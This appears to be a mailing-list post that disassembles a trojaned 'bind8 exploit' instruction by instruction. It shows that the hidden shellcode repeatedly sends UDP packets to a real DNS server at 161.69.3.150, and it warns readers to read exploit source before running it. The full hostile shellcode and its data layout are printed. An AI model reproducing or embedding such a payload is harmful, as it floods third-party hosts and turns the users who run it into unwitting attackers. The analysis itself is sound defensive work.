Analyzis of the bind8 trojaned exploit
--------------------------------------

here's the code:

0x8049540 <shellcode>:  jmp    0x8049576 <shellcode+54>
0x8049542 <shellcode+2>:        pop    %esi
0x8049543 <shellcode+3>:        mov    $0x1,%ebx
0x8049548 <shellcode+8>:        mov    %esi,%ecx
0x804954a <shellcode+10>:       mov    $0x66,%eax
0x804954f <shellcode+15>:       int    $0x80
0x8049551 <shellcode+17>:       mov    %eax,0x14(%esi)
0x8049554 <shellcode+20>:       lea    0x30(%esi),%eax
0x8049557 <shellcode+23>:       mov    %eax,0x18(%esi)
0x804955a <shellcode+26>:       xor    %eax,%eax
0x804955c <shellcode+28>:       mov    %eax,0x20(%esi)
0x804955f <shellcode+31>:       lea    0xc(%esi),%eax
0x8049562 <shellcode+34>:       mov    %eax,0x24(%esi)
0x8049565 <shellcode+37>:       mov    $0x66,%eax
0x804956a <shellcode+42>:       mov    $0xb,%ebx
0x804956f <shellcode+47>:       lea    0x14(%esi),%ecx
0x8049572 <shellcode+50>:       int    $0x80
0x8049574 <shellcode+52>:       jmp    0x8049565 <shellcode+37>
0x8049576 <shellcode+54>:       call   0x8049542 <shellcode+2>

here's what it does:

<shellcode>:    jmp    0x8049576 <shellcode+54>
<shellcode+2>:  pop    %esi

        address of data into %esi

<shellcode+3>:  mov    $0x1,%ebx
<shellcode+8>:  mov    %esi,%ecx
<shellcode+10>: mov    $0x66,%eax
<shellcode+15>: int    $0x80

        eax = 0x66 (102 is the syscall number of socketcall)
        ebx = 0x1 (1 is the call number of sys_socket)
        ecx = shellcode+59 (address of args)

        (gdb) x/3 shellcode+59
        <shellcode+59>:       0x00000002      0x00000002      0x00000011

        family = 2 (AF_INET, <linux/socket.h>)
        type = 2 (SOCK_DGRAM, <asm/socket.h>)
        protocol = 0x11 (17, UDP, <linux/in.h>)

        socket descriptor is returned in %eax

<shellcode+17>: mov    %eax,0x14(%esi)

        store the descriptor at shellcode+79

<shellcode+20>: lea    0x30(%esi),%eax

        get address of shellcode+107 (beginning of the actual exploit code) into %eax

<shellcode+23>: mov    %eax,0x18(%esi)

        store that address in shellcode+83

<shellcode+26>: xor    %eax,%eax

        zero out eax

<shellcode+28>: mov    %eax,0x20(%esi)

        store that zero into shellcode+91 (this are flags, but read on)

<shellcode+31>: lea    0xc(%esi),%eax

        get address of shellcode+71 (struct sockaddr for sendto, but read on) into %eax

<shellcode+34>: mov    %eax,0x24(%esi)

        store that address into shellcode+95

<shellcode+37>: mov    $0x66,%eax
<shellcode+42>: mov    $0xb,%ebx
<shellcode+47>: lea    0x14(%esi),%ecx

        eax = 0x66 (102 is the syscall number of socketcall)
        ebx = 0xb (11 is the call number of sys_sendto)
        ecx = shellcode+79 (address of args)

        args are (int fs, void *buff, size_t len, unsigned flags, struct sockaddr 
*addr, int addr_len),
        thus:

        fs = [shellcode+79] = value received from socket call (socket descriptor)

        buff = [shellcode+83] = shellcode+107 = that's where actual exploit code is 
stored i presume

        len = [shellcode+87] = 0x400, send 1024 chars
        (gdb) x/1 shellcode+87
        <shellcode+87>: 0x00000400

        flags = [shellcode+91] = 0, no special flags

        addr = [shellcode+95] = shellcode+71, this is struct sockaddr_in
        (gdb) x/10 shellcode+71
        <shellcode+71>:         0x35000002      0x960345a1      0xffffffff      
0xffffffef
        <shellcode+87>:         0x00000400      0x00000000      0x809a5f02      
0x00000010
        <shellcode+103>:        0x6e69622f      0x0068732f

        struct sockaddr_in {
         sa_family_t           sin_family;     /* Address family               */
         unsigned short int    sin_port;       /* Port number                  */
         struct in_addr        sin_addr;       /* Internet address             */
         ...
        };

        thus:
        sin_family = 0x0002 (AF_INET)
        sin_port = 0x3500 (or in host order 0x0035, which is 53)
        sin_addr = 0x 96 03 45 a1 (nothing other than 161.69.3.150, dns1.nai.com)

        addr_len = [shellcode+99] = 0x10 (16 bytes, the length of struct sockaddr)

<shellcode+50>: int    $0x80

        do the thing

<shellcode+52>: jmp    0x8049565 <shellcode+37>

        loop sys_sendto()

<shellcode+54>: call   0x8049542 <shellcode+2>

        call used to get the address of data (we jump here in the beginning)

<shellcode+59>:
        data starts here..


Lesson:
-------

Use the force, read the source!



--
Sergei Ledovskij +358(40)8245708 [EMAIL PROTECTED]
Makelankatu 91  PO. 21 Helsinki  00601 Finland

Reply via email to